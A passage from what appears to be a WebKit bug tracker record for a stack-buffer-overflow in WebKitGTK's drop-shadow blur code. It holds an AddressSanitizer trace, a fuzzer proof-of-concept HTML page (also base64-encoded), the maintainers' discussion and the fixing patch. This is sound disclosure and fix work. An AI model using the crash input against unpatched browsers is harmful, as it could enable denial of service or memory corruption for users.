WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>&&)::'lambda'(auto&&...), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>, 0ul, 1ul>(WebKit::WebProcess&&, WebKit::WebProcess&&, std::integer_sequence<unsigned long, 0ul, 1ul>) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/tuple:1854:14 #21 0x7f4c07912bd1 in decltype(auto) std::apply<void IPC::callMemberFunction<WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>&&)::'lambda'(auto&&...), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess&&, WebKit::WebProcess&&) /usr/bin/../lib/gcc/x86_64-linux-gnu/11/../../../../include/c++/11/tuple:1865:14 #22 0x7f4c07912bd1 in void IPC::callMemberFunction<WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters> >(WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&), std::tuple<WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters>&&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/HandleMessage.h:134:5 #23 0x7f4c07912bd1 in void IPC::handleMessage<Messages::WebProcess::CreateWebPage, WebKit::WebProcess, WebKit::WebProcess, void (WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&)>(IPC::Connection&, IPC::Decoder&, WebKit::WebProcess*, void (WebKit::WebProcess::*)(WTF::ObjectIdentifierGeneric<WebCore::PageIdentifierType, WTF::ObjectIdentifierMainThreadAccessTraits>, WebKit::WebPageCreationParameters&&)) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/HandleMessage.h:236:9 #24 0x7f4c07912bd1 in WebKit::WebProcess::didReceiveWebProcessMessage(IPC::Connection&, IPC::Decoder&) /home/fuzz/Downloads/webkitgtk-2.41.92/build/DerivedSources/WebKit/WebProcessMessageReceiver.cpp:122:16 #25 0x7f4c08c93deb in WebKit::WebProcess::didReceiveMessage(IPC::Connection&, IPC::Decoder&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/WebProcess/WebProcess.cpp:932:9 #26 0x7f4c0831fee0 in IPC::Connection::dispatchMessage(IPC::Decoder&) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/Connection.cpp:1233:15 #27 0x7f4c083204a5 in IPC::Connection::dispatchMessage(std::unique_ptr<IPC::Decoder, std::default_delete<IPC::Decoder> >) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/Connection.cpp:1281:9 #28 0x7f4c08320cb6 in IPC::Connection::dispatchOneIncomingMessage() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/Connection.cpp:1346:5 #29 0x7f4c0832338f in IPC::Connection::enqueueIncomingMessage(std::unique_ptr<IPC::Decoder, std::default_delete<IPC::Decoder> >)::$_15::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebKit/Platform/IPC/Connection.cpp:1195:28 #30 0x7f4c0832338f in WTF::Detail::CallableWrapper<IPC::Connection::enqueueIncomingMessage(std::unique_ptr<IPC::Decoder, std::default_delete<IPC::Decoder> >)::$_15, void>::call() /home/fuzz/Downloads/webkitgtk-2.41.92/build/WTF/Headers/wtf/Function.h:53:39 #31 0x7f4c0499d4a9 in WTF::Function<void ()>::operator()() const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/Function.h:82:35 #32 0x7f4c0499d4a9 in WTF::RunLoop::performWork() /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/RunLoop.cpp:147:9 #33 0x7f4c04b07d98 in WTF::RunLoop::RunLoop()::$_1::operator()(void*) const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:80:42 #34 0x7f4c04b07d98 in WTF::RunLoop::RunLoop()::$_1::__invoke(void*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:79:43 #35 0x7f4c04b05433 in WTF::RunLoop::$_0::operator()(_GSource*, int (*)(void*), void*) const /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:53:28 #36 0x7f4c04b05433 in WTF::RunLoop::$_0::__invoke(_GSource*, int (*)(void*), void*) /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WTF/wtf/glib/RunLoopGLib.cpp:45:5 #37 0x7f4bfcb20c43 in g_main_context_dispatch (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x55c43) (BuildId: c74e800dfd5f72649d673b44292f4a817e45150b) SUMMARY: AddressSanitizer: stack-buffer-overflow /home/fuzz/Downloads/webkitgtk-2.41.92/Source/WebCore/platform/graphics/texmap/TextureMapperGL.cpp:359:23 in WebCore::computeGaussianKernel(float, std::array<float, 6ul>&, std::array<float, 6ul>&) Shadow bytes around the buggy address: 0x0fe9f651cd60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe9f651cd70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe9f651cd80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe9f651cd90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0fe9f651cda0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0fe9f651cdb0: 00 00 00 00 f1 f1 f1 f1 00 00 00 00 00[04]f2 f2 0x0fe9f651cdc0: f2 f2 00 f2 f2 f2 00 00 00 f2 f2 f2 f2 f2 00 00 0x0fe9f651cdd0: 00 f2 f2 f2 f2 f2 f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 0x0fe9f651cde0: f8 f8 f8 f8 f8 f8 f2 f2 f2 f2 f8 f8 f8 f8 f8 f8 0x0fe9f651cdf0: f8 f8 f8 f8 f8 f8 f8 f8 f8 f8 f3 f3 f3 f3 f3 f3 0x0fe9f651ce00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==237950==ABORTING ``` 1. Proof-of-Concept ```cpp <style> .class2 { -webkit-filter: blur(0em) drop-shadow(91px 36px 1024em black); } x48,.class0:read-only { border-style: groove outset outset hidden; } *:nth-child(odd) { display: block table; } style { -webkit-animation: keyframes2,keyframes3 0.5s steps(454),ease-out alternate-reverse,normal both; } @keyframes keyframes3 { 40% { -webkit-transform: scaleX(43) } } </style> <a id="x56" ping="x" draggable="true" class="class2" translate="yes" itemtype="AAAAAAAA" charset="UTF-16" contextmenu="foo" slot="foo" webkitdropzone="copy" onfocus="f3()"> <image id="x21" tabindex="-1" preserveAspectRatio="xMaxYMax" buffered-rendering="dynamic" class="class0" paint-order="stroke markers" width="0px" vector-effect="non-scaling-stroke" clip="rect(auto,0px,auto,auto)" transform="rotate(180deg) translate(100%,284em)" x="16%"> ``` 1. Software Download Link a. https://webkitgtk.org/ 1996192 1 webkit-bug-importer 2023-12-01 05:35:14 -0800 <rdar://problem/119031226> 1996578 2 fujii 2023-12-03 13:06:35 -0800 Thank you very much for the report! 1996579 3 468845 fujii 2023-12-03 13:09:43 -0800 Created attachment 468845 WIP patch 1996583 4 468846 fujii 2023-12-03 13:41:54 -0800 Created attachment 468846 test case 2 1996584 5 fujii 2023-12-03 13:53:37 -0800 Hi, Brent. If a securty bug is assinged to webkit-unassigned@lists.webkit.org, comments are published like https://lists.webkit.org/pipermail/webkit-unassigned/2023-December/1136022.html Could you search securty bugs assinged to webkit-unassigned@lists.webkit.org? 1996588 6 mcatanzaro 2023-12-03 15:26:19 -0800 I will request a CVE for this issue. (In reply to Fujii Hironori from comment #5) > Hi, Brent. > > If a securty bug is assinged to webkit-unassigned@lists.webkit.org, comments > are published like > https://lists.webkit.org/pipermail/webkit-unassigned/2023-December/1136022. > html Ouch... 1996658 7 cgarcia 2023-12-04 00:52:38 -0800 The shadow blur patches were reverted in our stable branch because they broke rendering in rpi, so this might not affect 2.42.2. 1996712 8 mcatanzaro 2023-12-04 06:57:15 -0800 OK great. Since no stable release is affected by this bug, and requesting CVEs for unstable releases that are only used by testers is not worthwhile, we don't need a CVE after all. But the bug still needs to be fixed in main, of course. (Good find; thanks for reporting this issue.) I had wondered why these patches had been reverted. If they broke rendering on Raspberry Pi and it's still broken in main, maybe we should revert them there too? Are we really comfortable with Raspberry Pi being broken? 1996807 9 fujii 2023-12-04 11:53:23 -0800 bug#261870 is tracking the rpi issue. 1997301 10 468907 fujii 2023-12-05 20:01:11 -0800 Created attachment 468907 Patch 1997307 11 fujii 2023-12-05 20:55:40 -0800 Invoking 'webkit-patch upload' complains. > The patch you are uploading references https://bugs.webkit.org/show_bug.cgi?id=265659 > https://bugs.webkit.org/show_bug.cgi?id=265659 matches 'project:Security' and is thus redacted > Please use 'git-webkit' to upload this fix. 'webkit-patch' does not support security changes Should I really use git-webkit for a security bug? 1997358 12 468907 fujii 2023-12-06 05:04:03 -0800 Comment on attachment 468907 Patch EWS doesn't process this patch. I have to create a GitHub pull request. 1997367 13 mcatanzaro 2023-12-06 06:07:08 -0800 (In reply to Fujii Hironori from comment #11) > Should I really use git-webkit for a security bug? Just make sure it creates the pull request in the security repo and not the public repo. 1997504 14 jbedard 2023-12-06 14:03:45 -0800 Pull request: https://github.com/WebKit/WebKit-security/pull/50 1997507 15 jbedard 2023-12-06 14:06:31 -0800 I reached out to Fuji, he isn't part of the security group yet, so I've posted the PR for him to get it reviewed. As Michael points out, this hasn't shipped yet, so the PR is made against `main` in WebKit/WebKit-security, we'll land in public once the change is reviewed and clears EWS. 1999552 16 mcatanzaro 2023-12-14 05:40:20 -0800 So in the pull request I requested the addition of a RELEASE_ASSERT() to make sure the buffer index is in range. I also approved the pull request. But finally I remembered that Fujii doesn't have access to the security repo yet and could not see any of my review feedback. I don't think we need to follow the standard security process for this particular bug because (a) it doesn't affect Apple products, and (b) it also doesn't affect stable releases of WPE/GTK (yet). It can't even land on our stable branches since the commit it fixes is reverted there, so the only place for the fix to land is main. Accordingly, I'm making this bug public now. Fujii, please prepare a pull request using the normal repo and we can get this landed. Thanks! 1999683 17 fujii 2023-12-14 12:16:57 -0800 Public PR: https://github.com/WebKit/WebKit/pull/21821 1999756 18 ews-feeder 2023-12-14 16:11:55 -0800 Committed 272081@main (15dc72ca9521): <https://commits.webkit.org/272081@main> Reviewed commits have been landed. Closing PR #21821 and removing active labels. 468832 2023-12-01 05:29:27 -0800 2023-12-01 05:29:27 -0800 PoC file poc.html text/html 835 pswpsw0177 PHN0eWxlPgouY2xhc3MyIHsgCiAgLXdlYmtpdC1maWx0ZXI6IGJsdXIoMGVtKSBkcm9wLXNoYWRv dyg5MXB4IDM2cHggMTAyNGVtIGJsYWNrKTsKfQp4NDgsLmNsYXNzMDpyZWFkLW9ubHkgeyAKICBi b3JkZXItc3R5bGU6IGdyb292ZSBvdXRzZXQgb3V0c2V0IGhpZGRlbjsKfQoqOm50aC1jaGlsZChv ZGQpIHsgCiAgZGlzcGxheTogYmxvY2sgdGFibGU7Cn0Kc3R5bGUgeyAKICAtd2Via2l0LWFuaW1h dGlvbjoga2V5ZnJhbWVzMixrZXlmcmFtZXMzIDAuNXMgc3RlcHMoNDU0KSxlYXNlLW91dCBhbHRl cm5hdGUtcmV2ZXJzZSxub3JtYWwgYm90aDsKfQoKQGtleWZyYW1lcyBrZXlmcmFtZXMzIHsKICA0 MCUgeyAtd2Via2l0LXRyYW5zZm9ybTogc2NhbGVYKDQzKSB9Cn0KPC9zdHlsZT4KCjxhIGlkPSJ4 NTYiIHBpbmc9IngiIGRyYWdnYWJsZT0idHJ1ZSIgY2xhc3M9ImNsYXNzMiIgdHJhbnNsYXRlPSJ5 ZXMiIGl0ZW10eXBlPSJBQUFBQUFBQSIgY2hhcnNldD0iVVRGLTE2IiBjb250ZXh0bWVudT0iZm9v IiBzbG90PSJmb28iIHdlYmtpdGRyb3B6b25lPSJjb3B5IiBvbmZvY3VzPSJmMygpIj4KPGltYWdl IGlkPSJ4MjEiIHRhYmluZGV4PSItMSIgcHJlc2VydmVBc3BlY3RSYXRpbz0ieE1heFlNYXgiIGJ1 ZmZlcmVkLXJlbmRlcmluZz0iZHluYW1pYyIgY2xhc3M9ImNsYXNzMCIgcGFpbnQtb3JkZXI9InN0 cm9rZSBtYXJrZXJzIiB3aWR0aD0iMHB4IiB2ZWN0b3ItZWZmZWN0PSJub24tc2NhbGluZy1zdHJv a2UiIGNsaXA9InJlY3QoYXV0bywwcHgsYXV0byxhdXRvKSIgdHJhbnNmb3JtPSJyb3RhdGUoMTgw ZGVnKSB0cmFuc2xhdGUoMTAwJSwyODRlbSkiIHg9IjE2JSI+Cg== 468845 2023-12-03 13:09:43 -0800 2023-12-03 13:09:43 -0800 WIP patch wip.patch text/plain 681 fujii ZGlmZiAtLWdpdCBhL1NvdXJjZS9XZWJDb3JlL3BsYXRmb3JtL2dyYXBoaWNzL3RleG1hcC9UZXh0 dXJlTWFwcGVyLmNwcCBiL1NvdXJjZS9XZWJDb3JlL3BsYXRmb3JtL2dyYXBoaWNzL3RleG1hcC9U ZXh0dXJlTWFwcGVyLmNwcA0KaW5kZXggY2MwMTYxMTI5MmYwLi4zNGUwYTY5MWFhMDUgMTAwNjQ0 DQotLS0gYS9Tb3VyY2UvV2ViQ29yZS9wbGF0Zm9ybS9ncmFwaGljcy90ZXhtYXAvVGV4dHVyZU1h cHBlci5jcHANCisrKyBiL1NvdXJjZS9XZWJDb3JlL3BsYXRmb3JtL2dyYXBoaWNzL3RleG1hcC9U ZXh0dXJlTWFwcGVyLmNwcA0KQEAgLTk5OSw3ICs5OTksNyBAQCBSZWZQdHI8Qml0bWFwVGV4dHVy ZT4gVGV4dHVyZU1hcHBlcjo6YXBwbHlEcm9wU2hhZG93RmlsdGVyKFJlZlB0cjxCaXRtYXBUZXh0 dXJlPg0KICAgICAgICAgICAgICAgICBzdGQ6Om1heCh0ZXh0dXJlU2l6ZS5oZWlnaHQoKSAqIHNj YWxlLCAxLmYpDQogICAgICAgICAgICAgKTsNCiAgICAgICAgICAgICBzY2FsZSA9IGZsb2F0KHRh cmdldFNpemUud2lkdGgoKSkgLyB0ZXh0dXJlU2l6ZS53aWR0aCgpOw0KLSAgICAgICAgICAgIHJh ZGl1cyAqPSBzY2FsZTsNCisgICAgICAgICAgICByYWRpdXMgPSBzdGQ6Om1pbihHYXVzc2lhbkJs dXJNYXhSYWRpdXMsIHJhZGl1cyAqIHNjYWxlKTsNCiAgICAgICAgIH0NCiAgICAgfQ0KIA0K 468846 2023-12-03 13:41:54 -0800 2023-12-03 13:41:54 -0800 test case 2 testcase.html text/html 125 fujii PCFET0NUWVBFIGh0bWw+DQo8c3R5bGU+DQogIDpyb290IHsNCiAgICAgIHdpbGwtY2hhbmdlOiB0 cmFuc2Zvcm07DQogICAgICBmaWx0ZXI6IGRyb3Atc2hhZG93KDAgMCAxMDAwMDBweCk7DQogIH0N Cjwvc3R5bGU+DQo= 468907 2023-12-05 20:01:11 -0800 2023-12-05 20:01:11 -0800 Patch 0001-TextureMapper-shrinked-blur-radius-of-drop-shadow-sh.patch text/plain 3455 fujii RnJvbSBiNmJhOWM3ZmZhMzg5ZmNjMDkyM2QwN2RmMmU1MDY2MzQ3Y2ZhNTAwIE1vbiBTZXAgMTcg MDA6MDA6MDAgMjAwMQpGcm9tOiBGdWppaSBIaXJvbm9yaSA8SGlyb25vcmkuRnVqaWlAc29ueS5j b20+CkRhdGU6IFdlZCwgNiBEZWMgMjAyMyAxMjozNzo1NiArMDkwMApTdWJqZWN0OiA9P1VURi04 P3E/W1RleHR1cmVNYXBwZXJdPTIwc2hyaW5rZWQ9MjBibHVyPTIwcmFkaXVzPTIwb2Y9MjBkcm9w LT89CiA9P1VURi04P3E/c2hhZG93PTIwc2hvdWxkbid0PTIwZXhjZWVkPTIwR2F1c3NpYW5CbHVy TWF4UmFkaXVzPTBBaHR0cHM6Ly9iPz0KID0/VVRGLTg/cT91Z3Mud2Via2l0Lm9yZy9zaG93PTVG YnVnLmNnaT0zRmlkPTNEMjY1NjU5Pz0KClJldmlld2VkIGJ5IE5PQk9EWSAoT09QUyEpLgoKVGV4 dHVyZU1hcHBlcjo6YXBwbHlEcm9wU2hhZG93RmlsdGVyIHNocmlua3MgYSBzb3VyY2UgdGV4dHVy ZSBhbmQgYQpibHVyIHJhZGl1cyBvZiBkcm9wLXNoYWRvdyBiZWZvcmUgYXBwbHlpbmcgYSBibHVy IGZpbHRlci4gVGhlCmRvd25zY2FsaW5nIHJhdGlvIGlzIGJhc2VkIG9uIHRoZSBibHVyIHJhZGl1 cyBzbyB0aGF0IHRoZSBzaHJpbmtlZApibHVyIHJhZGl1cyBkb2Vzbid0IGV4Y2VlZCBHYXVzc2lh bkJsdXJNYXhSYWRpdXMuIEhvd2V2ZXIsIHRoZQpjYWxjdWxhdGlvbiB3YXNuJ3QgY29ycmVjdC4g aXQgY291bGQgc2xpZ2h0bHkgZXhjZWVkCkdhdXNzaWFuQmx1ck1heFJhZGl1cyBpZiBhIGJsdXIg cmFkaXVzIGlzIHZlcnkgbGFyZ2UuCgoqIExheW91dFRlc3RzL2NvbXBvc2l0aW5nL2ZpbHRlcnMv ZHJvcC1zaGFkb3ctbGFyZ2UtYmx1ci1yYWRpdXMtZXhwZWN0ZWQuaHRtbDogQWRkZWQuCiogTGF5 b3V0VGVzdHMvY29tcG9zaXRpbmcvZmlsdGVycy9kcm9wLXNoYWRvdy1sYXJnZS1ibHVyLXJhZGl1 cy5odG1sOiBBZGRlZC4KKiBTb3VyY2UvV2ViQ29yZS9wbGF0Zm9ybS9ncmFwaGljcy90ZXhtYXAv VGV4dHVyZU1hcHBlci5jcHA6ClVzZSBzdGQ6Om1pbiB0byByYWRpdXMgYXMgd2VsbCBhcyBUZXh0 dXJlTWFwcGVyOjphcHBseUJsdXJGaWx0ZXIgZG9lcy4KLS0tCiAuLi4vZHJvcC1zaGFkb3ctbGFy Z2UtYmx1ci1yYWRpdXMtZXhwZWN0ZWQuaHRtbCAgICAgfCAxMiArKysrKysrKysrKysKIC4uLi9m aWx0ZXJzL2Ryb3Atc2hhZG93LWxhcmdlLWJsdXItcmFkaXVzLmh0bWwgICAgICB8IDEzICsrKysr KysrKysrKysKIC4uLi9wbGF0Zm9ybS9ncmFwaGljcy90ZXhtYXAvVGV4dHVyZU1hcHBlci5jcHAg ICAgICB8ICAyICstCiAzIGZpbGVzIGNoYW5nZWQsIDI2IGluc2VydGlvbnMoKyksIDEgZGVsZXRp b24oLSkKIGNyZWF0ZSBtb2RlIDEwMDY0NCBMYXlvdXRUZXN0cy9jb21wb3NpdGluZy9maWx0ZXJz L2Ryb3Atc2hhZG93LWxhcmdlLWJsdXItcmFkaXVzLWV4cGVjdGVkLmh0bWwKIGNyZWF0ZSBtb2Rl IDEwMDY0NCBMYXlvdXRUZXN0cy9jb21wb3NpdGluZy9maWx0ZXJzL2Ryb3Atc2hhZG93LWxhcmdl LWJsdXItcmFkaXVzLmh0bWwKCmRpZmYgLS1naXQgYS9MYXlvdXRUZXN0cy9jb21wb3NpdGluZy9m aWx0ZXJzL2Ryb3Atc2hhZG93LWxhcmdlLWJsdXItcmFkaXVzLWV4cGVjdGVkLmh0bWwgYi9MYXlv dXRUZXN0cy9jb21wb3NpdGluZy9maWx0ZXJzL2Ryb3Atc2hhZG93LWxhcmdlLWJsdXItcmFkaXVz LWV4cGVjdGVkLmh0bWwKbmV3IGZpbGUgbW9kZSAxMDA2NDQKaW5kZXggMDAwMDAwMDAwMDAwLi5i ZDJkOWIyM2E2YzkKLS0tIC9kZXYvbnVsbAorKysgYi9MYXlvdXRUZXN0cy9jb21wb3NpdGluZy9m aWx0ZXJzL2Ryb3Atc2hhZG93LWxhcmdlLWJsdXItcmFkaXVzLWV4cGVjdGVkLmh0bWwKQEAgLTAs MCArMSwxMiBAQAorPCFET0NUWVBFIGh0bWw+Cis8c3R5bGU+CisgICAgOnJvb3QgeworICAgICAg ICBiYWNrZ3JvdW5kOiByZ2JhKDAsIDAsIDAsIDAuMDIpOworICAgIH0KKyAgICBkaXYgeworICAg ICAgICBiYWNrZ3JvdW5kOiBncmVlbjsKKyAgICAgICAgd2lkdGg6IDEwMHB4OworICAgICAgICBo ZWlnaHQ6IDEwMHB4OworICAgIH0KKzwvc3R5bGU+Cis8ZGl2PjwvZGl2PgpkaWZmIC0tZ2l0IGEv TGF5b3V0VGVzdHMvY29tcG9zaXRpbmcvZmlsdGVycy9kcm9wLXNoYWRvdy1sYXJnZS1ibHVyLXJh ZGl1cy5odG1sIGIvTGF5b3V0VGVzdHMvY29tcG9zaXRpbmcvZmlsdGVycy9kcm9wLXNoYWRvdy1s YXJnZS1ibHVyLXJhZGl1cy5odG1sCm5ldyBmaWxlIG1vZGUgMTAwNjQ0CmluZGV4IDAwMDAwMDAw MDAwMC4uYjhmNDhhNTk1YTI2Ci0tLSAvZGV2L251bGwKKysrIGIvTGF5b3V0VGVzdHMvY29tcG9z aXRpbmcvZmlsdGVycy9kcm9wLXNoYWRvdy1sYXJnZS1ibHVyLXJhZGl1cy5odG1sCkBAIC0wLDAg KzEsMTMgQEAKKzwhRE9DVFlQRSBodG1sPgorPG1ldGEgbmFtZT0iZnV6enkiIGNvbnRlbnQ9Im1h eERpZmZlcmVuY2U9MC01OyB0b3RhbFBpeGVscz0wLTQ4MDAwMCIgLz4KKzxzdHlsZT4KKyAgICBk aXYgeworICAgICAgICBiYWNrZ3JvdW5kOiBncmVlbjsKKyAgICAgICAgd2lkdGg6IDEwMHB4Owor ICAgICAgICBoZWlnaHQ6IDEwMHB4OworICAgICAgICB3aWxsLWNoYW5nZTogdHJhbnNmb3JtOwor ICAgICAgICAvLyBBIGJsYWNrIGRyb3Atc2hhZG93IHdpdGggYSB2ZXJ5IGxhcmdlIGJsdXIgcmFk aXVzIGxvb2tzIGxpa2UgYWxtb3N0IG5vIGRyb3Atc2hhZG93IHdpdGggc2xpZ2h0bHkgZGFyayBi YWNrZ3JvdW5kLgorICAgICAgICBmaWx0ZXI6IGRyb3Atc2hhZG93KDAgMCAxMDAwMDAwcHgpOwor ICAgIH0KKzwvc3R5bGU+Cis8ZGl2PjwvZGl2PgpkaWZmIC0tZ2l0IGEvU291cmNlL1dlYkNvcmUv cGxhdGZvcm0vZ3JhcGhpY3MvdGV4bWFwL1RleHR1cmVNYXBwZXIuY3BwIGIvU291cmNlL1dlYkNv cmUvcGxhdGZvcm0vZ3JhcGhpY3MvdGV4bWFwL1RleHR1cmVNYXBwZXIuY3BwCmluZGV4IGNjMDE2 MTEyOTJmMC4uMzRlMGE2OTFhYTA1IDEwMDY0NAotLS0gYS9Tb3VyY2UvV2ViQ29yZS9wbGF0Zm9y bS9ncmFwaGljcy90ZXhtYXAvVGV4dHVyZU1hcHBlci5jcHAKKysrIGIvU291cmNlL1dlYkNvcmUv cGxhdGZvcm0vZ3JhcGhpY3MvdGV4bWFwL1RleHR1cmVNYXBwZXIuY3BwCkBAIC05OTksNyArOTk5 LDcgQEAgUmVmUHRyPEJpdG1hcFRleHR1cmU+IFRleHR1cmVNYXBwZXI6OmFwcGx5RHJvcFNoYWRv d0ZpbHRlcihSZWZQdHI8Qml0bWFwVGV4dHVyZT4KICAgICAgICAgICAgICAgICBzdGQ6Om1heCh0 ZXh0dXJlU2l6ZS5oZWlnaHQoKSAqIHNjYWxlLCAxLmYpCiAgICAgICAgICAgICApOwogICAgICAg ICAgICAgc2NhbGUgPSBmbG9hdCh0YXJnZXRTaXplLndpZHRoKCkpIC8gdGV4dHVyZVNpemUud2lk dGgoKTsKLSAgICAgICAgICAgIHJhZGl1cyAqPSBzY2FsZTsKKyAgICAgICAgICAgIHJhZGl1cyA9 IHN0ZDo6bWluKEdhdXNzaWFuQmx1ck1heFJhZGl1cywgcmFkaXVzICogc2NhbGUpOwogICAgICAg ICB9CiAgICAgfQogCi0tIAoyLjQzLjAud2luZG93cy4xCgo=